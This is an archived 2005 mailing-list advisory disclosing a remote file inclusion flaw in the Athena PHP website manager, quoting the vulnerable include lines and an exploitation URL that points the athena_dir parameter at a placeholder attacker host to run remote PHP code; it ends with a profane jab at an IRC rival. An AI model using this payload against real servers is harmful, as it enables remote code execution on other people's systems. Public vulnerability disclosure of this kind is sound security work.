Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]

Remote file include in Athena

Subject: Remote file include in Athena
Date: 26 Nov 2005 22:23:18 -0000
Language: PHP
Script: Athena
Version: 0.1a
Official website: http://sourceforge.net/projects/athena
Problem: Remote file inclusion
Discovered by: beford & ][GB][
 
Description:
===========
 
A simple website management system written in oo php that uses a mysql database 
to store user and group rights and the site content.
 
Problem:
========
A remote user can include and execute arbitrary PHP code from the remote 
location.
The problem is in the file "athena.php" for line 1 to 10:

include("$athena_dir/headers.php"); 
include("$athena_dir/classes/debug.php");
include("$athena_dir/classes/mysql.php");
include("$athena_dir/classes/config.php");
include("$athena_dir/classes/page.php");
include("$athena_dir/classes/session.php");
include("$athena_dir/classes/user.php");
include("$athena_dir/classes/error.php");
include("$athena_dir/classes/modules.php");
include("$athena_dir/classes/admin.php");

 
Explotation example:
===================

http://[target]/path_to_athena/athena.php?athena_dir=http://[attacker_url]

 
Solution:
========
 
Not solution at this time.
 
 
Greetz:
=======
 
uyx, beford, Zetha, lithyum,_|MALANDDO|_ ,desKrriado, |LINUX|, Amon-Ra, 
Extremo, SecretDreams, caffa
 
&& irc.gigachat.net #uruguay, #h4ck3rsbr, #IYS, #D.O.M, #MSR ,,, 
irc.fullnetwork.org #full, #f4kelive
   
irc.org.ve #uruguay, #venezuela
 
Fuckz:
=====
Morgan lamer and his irc.irc-argentina.org, his small ddos-botnet, its hidden 
in that server, the bot
s are
supposed to be argentinian users but noooo, he is using that ripped worm code i 
mentioned before!!!
he is such a leet h4x0r from santiago del estero (.ar)! hahahhaa

<Prev in Thread] Current Thread [Next in Thread>
  • Remote file include in Athena, gb . network <=